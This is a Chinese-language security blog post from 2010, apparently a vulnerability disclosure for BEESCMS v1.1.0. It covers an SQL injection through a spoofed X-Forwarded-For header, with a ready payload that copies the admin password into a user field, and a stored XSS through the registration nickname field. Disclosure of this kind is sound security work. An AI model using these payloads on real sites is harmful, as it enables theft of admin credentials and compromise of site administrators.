安全漏洞 订阅所有【安全漏洞】的日志

BEESCMS v1.1.0 getip()注射漏洞与XSS

作者:王者星星 日期:2010-10-26

字体大小:

发布日期:2010-10.25
发布作者:子仪

影响版本:BEESCMS v1.1.0
官方地址:http://www.beescms.com

漏洞类型:SQL注入XSS
漏洞描述:BEES企业网站管理系统(以下称BEES)是一个基于PHP+Mysql架构的企业网站管理系统。BEES 采用模块化方式开发,功能强大灵活易于扩展,并且完全开放源代码,多种语言分站,为企业网站建设和外贸提供解决方案。

漏洞1:

  1. fun.php  
  2. function get_ip(){  
  3. if(!empty($_SERVER['HTTP_CLIENT_IP']))  
  4. {  
  5. return $_SERVER['HTTP_CLIENT_IP'];  
  6. }  
  7. elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //这里可以伪造  
  8. {  
  9. return $_SERVER['HTTP_X_FORWARDED_FOR'];  
  10. }  
  11. else  
  12. {  
  13. return $_SERVER['REMOTE_ADDR'];  
  14. }  
  15. }  
  16.  
  17. reg.php  
  18. $ip=get_ip();  
  19. $sql="update ".DB_PRE."member set member_time='{$addtime}',member_ip='{$ip}' where id={$last_id}";  
  20.  


简单构造一下x_forwarded_for:127.0.0.1',member_qq = (select admin_password from bees_admin),member_phone = 'ziyi,就把管理员密码射到你QQ号上了,过会发EXP。

 

漏洞2:XSS

同样是在注册页面,昵称没有过滤就入库,导致可以可以XSS。在昵称一栏填写<script>alert('子仪')</script>,注册成功后,当管理员在后台打开会员管理就会触发我们的XSS代码,如图:



文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.